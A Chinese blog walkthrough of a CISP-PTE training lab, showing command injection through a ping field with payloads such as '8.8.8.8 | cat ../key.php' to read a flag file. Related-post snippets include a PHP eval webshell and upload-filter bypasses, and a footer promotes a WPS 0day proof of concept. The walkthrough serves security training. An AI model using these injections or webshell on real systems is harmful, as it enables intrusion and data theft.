题目4 命令执行(保姆级教程)【文末有惊喜】

已于 2023-10-11 09:53:50 修改
阅读量332 收藏
点赞数
分类专栏: # CISP-PTE-Centos 文章标签: 安全 centos cisp-pte cisp 靶机
于 2023-07-21 17:25:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/honest_run/article/details/131856711
版权

url:http://192.168.154.253:84/  #打开http://XXX:81/,XXX为靶机的ip地址

审题

1、打开题目看到有一个提示,此题目需要通过利用命令执行漏洞执行Linux命令获取webshell,最后从根目录下key.php文件中获得flag

2、开始答题

第一步:测试命令执行漏洞点

1、传参 8.8.8.8

第二步:利用漏洞点拿到flag

猜测是执行了命令 ping 8.8.8.8

直接构建payload:ping 8.8.8.8 | ls

传参:

8.8.8.8 | ls

应该是过滤了一些命令,换命令执行

执行语句:

ping 8.8.8.8 | cat ../key.php

参数:

8.8.8.8 | cat ../key.php

执行语句:

ping 8.8.8.8 | tac ../key.php

参数:

8.8.8.8 | tac ../key.php

猎杀时刻

        目前在GG安全公众号中回复关键字"wps0day",即可获得wps打包套件及poc。

        为了方便师傅们的交流学习,根据广大师傅们的建议,我在之后也会创建一个的群聊。预计在内部群内,我们将分享一些脱敏的漏洞报告和渗透测试实战案例,还将会有一些经验丰富的大牛和巨佬分享他们的经验。后续还将提供一些福利,例如送书和小礼物等等。欢迎师傅们到时候加入群聊,一起交流学习,致力打造一个有丰富学习氛围的小圈子。

        公众号往期精彩内容(GG安全

xjizhi(GG安全)
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WebShell文件上传漏洞分析溯源(第4题)
qq_36933272的博客
09-03 154
设置浏览器代理,打开burpsuite,intercept is on,上传一句话木马的php文件 截断数据包,因为不能直接上传php,为了突破文件类型MIME的校验,需要修改content-type,这里修改成image/jpeg就可以突破限制 上传成功,菜刀连接,http://219.153.49.228:47316/uploads/muma.php,连接成功,显示不出来更新缓存 发现包含ke...
CISP-PTE学习总结之基础练习题(四)
千寻的博客
10-25 4163
考前练习题整理
CISP-PTE 考试 靶场
最新发布
qq_52579508的博客
06-20 943
先查看本地局域网的IP地址使用arp-scan 进行二层发现。
PTE学习作业
weixin_56910965的博客
07-01 1538
##被攻击者服务器为Linux:加粗样式 1.基础题目之SQL注入 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件中。 通过简单的测试,看到了 系统过滤了空格 咱为了省事直接sqlmap用起来,先去tamper里面找找哪个空格好使 答案出来了 复制路径 C:\Users\Admin\AppData\Local\sqlmap\output\172.16.12.1
CISP-PTE-Centos 靶机安装(保姆教程
honest_gg的博客
07-21 2223
CISP-PTE-Centos:考试(靶机)环境安装
CISP-PTE-centos6靶机教程
飞花舞者的博客
02-04 1327
CISP-PTEcentos靶场,小白训练复习拿来练手。
文件上传题型
我了解豹女就像农民伯伯了解大米
06-27 757
题目:通过你所学到的知识,测试其过WAF滤规则,突破上传获取webshell答案就在根目录key.php文件中。 先去上传1.php文件,里面编写一句话木马:<?php eval($_POST[c]);?> 通过抓包来获取内容,发现并没有上传成功 通过后缀名绕过上传:失败 通过内容头部绕过:成功 去访问上传的路径:http://192.168.129.128:82/vulnerabilities/1.phtml 使用蚁剑webshell进行连接:http:/..
中视频项目保姆实战教程-视频教程网盘链接提取码下载 .txt
05-22
十节视频课,主要讲内容制作和账号运营:包括选题、素材、文案、配音、剪辑以及运营维护的一些实战经验和实操演示。我讲的都是我们自己做出结果的,适合大家去模仿复制的实战玩法。通过这十节课,你能快速掌握中视频...
IBM x3650 M4 创建raid 安装ESXI 保姆教程
11-05
总结来说,这个保姆教程详细介绍了在IBM x3650 M4服务器上创建RAID 1阵列以及安装ESXi操作系统的过程,确保了数据安全性和操作系统的稳定运行。对于初次接触这一过程的人来说,遵循这些步骤将有助于避免错误并成功...
小学教辅资料,内部集训保姆教程-教程网盘链接提取码下载.txt
12-21
小学招生人数1800万人,在校生有1亿多背后有1亿多的家长,这些家长是有明确的教辅资料需求的,并且付费能力强小学生群体每年都有更新,每年都会有新的小学生,新的家长需要这个教辅资料 项目特点 产品型项目,容易...
2023闲鱼无货源超详细保姆教程-视频教程网盘链接提取码下载.txt
12-18
本课程将深入探讨2023年闲鱼无货源情况,为您提供超详细的解决方案。我们将详细介绍如何寻找替代货源、建立稳定的供应链以及利用社交媒体拓展...这是一份保姆教程,确保您能迅速适应并获得成功。 视频大小:772M
保姆搭建rancher教程
09-06
看着手册能自己搭建出来,保姆教程,我自己一步一步写的,看完还不会的只能说你不适合运维,咱换行吧。你可以尝试去搞搞开发,开发写写代码就行。
CISP-PTE学习总结之基础练习题(三)
千寻的博客
10-20 5711
练习题目一:SQL注入 0x01 题目要求 0x02 解答过程: 0x03 解题总结: 练习题目二:文件上传突破 0x01 题目要求: 0x02 解题过程: 0x03 解题总结: 练习题目三:文件包含 0x01 题目要求 0x02 解题过程 0x03 解题总结: 练习题目四:反序列化漏洞 0x01 题目要求: 0x02 解题过程 练习题目五:失效的访问控制 0x01 题目·要求: 0x02 解题过程: 0x03 解题总结:
CISP-PTE靶场搭建
qq_23667585的博客
07-18 3840
CISP-PTE靶场的搭建
CISP-PTE实操练习题讲解二(新版)
lza20001103的博客
08-06 6978
CISP-PTE实操练习题讲解二(新版)
CISP-PTE综合题(一)
Zt_Zk的博客
09-04 4217
一个综合题的靶场,做了一下综合题。
一次零基础靶机渗透细节全程记录
ran的博客
07-12 2770
渗透测试:渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法渗透测。1.确定目标:在本靶场中,确定目标就是使用nmap进行ip扫描,确定ip即为目标,只是针对此靶场而言。其他实战中确定目标的方式包括nmap进行扫描,但不局限于这个nmap。2.信息收集:比如平常挖洞使用fofa,天眼查,ip域名等进行查,在我们这个靶场中比如信息收集包括查看源码,使用工具dirb等。3.发现漏洞:那些理论比如sql注入,文件上传等,或者找
CISP-PTE-Windows2003教程
飞花舞者的博客
02-03 1423
防火墙关不掉,师傅们看要怎么搞???
cisp pte模拟题
m0_62207170的博客
05-31 853
cisp pte模拟题
零基础搭建Linux多节点环境:保姆教程
1. 使用`ifconfig`命令检查虚拟机的IP地址,发现系统未配置IP时,需要进行设置。 2. 设置虚拟机与宿主机的网络连接方式,推荐采用桥接模式,这样虚拟机将直接连接到物理主机的网络,确保两者可以互相通信。根据物理...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值